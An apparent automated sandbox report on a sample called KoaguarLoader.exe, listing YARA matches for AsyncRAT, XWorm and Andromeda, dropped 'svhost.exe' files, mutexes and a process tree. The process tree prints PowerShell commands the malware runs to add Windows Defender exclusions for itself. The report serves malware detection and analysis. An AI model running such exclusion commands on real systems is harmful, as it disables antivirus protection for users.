                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: svhost.exe.0.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.0.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.0.dr, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.3.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.3.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csCryptographic APIs: 'TransformFinalBlock'
                        Source: svhost.exe.0.dr, z6XG9VNMgzKSI0w.csBase64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, z6XG9VNMgzKSI0w.csBase64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, z6XG9VNMgzKSI0w.csBase64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: svhost.exe.3.dr, z6XG9VNMgzKSI0w.csBase64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, z6XG9VNMgzKSI0w.csBase64 encoded string: 'Ptci0funkG3c/qfIkLL4b5oLKMPLUO+N2bHrKTibmPzNTu9JyIaKk4Ykr0CdbX2s'
                        Source: svhost.exe.0.dr, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svhost.exe.0.dr, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: svhost.exe.3.dr, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: svhost.exe.3.dr, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, E1KFEgHGhH0nvji.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/30@3/6
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile created: C:\Program Files (x86)\samkkakieknhvpoltggsponlyggukwodzaiyyooxitakauyj\f6ef22dd-17e3-17c8-a968-f74f0764dd17Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Comms\f6ef22dd-17e3-17c8-a968-f74f0764dd17Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\svhost.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_03
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeMutant created: \Sessions\1\BaseNamedObjects\Global\WEBR_9A8P43Y2IR2Z
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7388:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeMutant created: \Sessions\1\BaseNamedObjects\yuxZVGCNWecgQM1n
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeJump to behavior
                        Source: KoaguarLoader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.86%
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Name from Win32_Processor
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CEC0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026EBF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.943416104.0000000000291000.00000040.00000001.01000000.00000009.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1079600336.00000000006E1000.00000040.00000001.01000000.0000000C.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164494001.000000002CE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164642380.000000002EE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2163927611.0000000024E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164789824.0000000030E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164087789.0000000026E8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2164352720.000000002AE8F000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000002984000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: KoaguarLoader.exeVirustotal: Detection: 87%
                        Source: KoaguarLoader.exeReversingLabs: Detection: 94%
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeFile read: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\KoaguarLoader.exe "C:\Users\user\Desktop\KoaguarLoader.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe"
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe "C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\svhost.exe "C:\Users\user\AppData\Roaming\svhost.exe"
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe "C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeProcess created: C:\Users\user\AppData\Local\Temp\svhost.exe "C:\Users\user\AppData\Local\Temp\svhost.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeProcess created: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe "C:\Program Files (x86)\windows nt\I1y524I4zau1n3u.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svhost.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\KoaguarLoader.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sspicli.dllJump to behavior
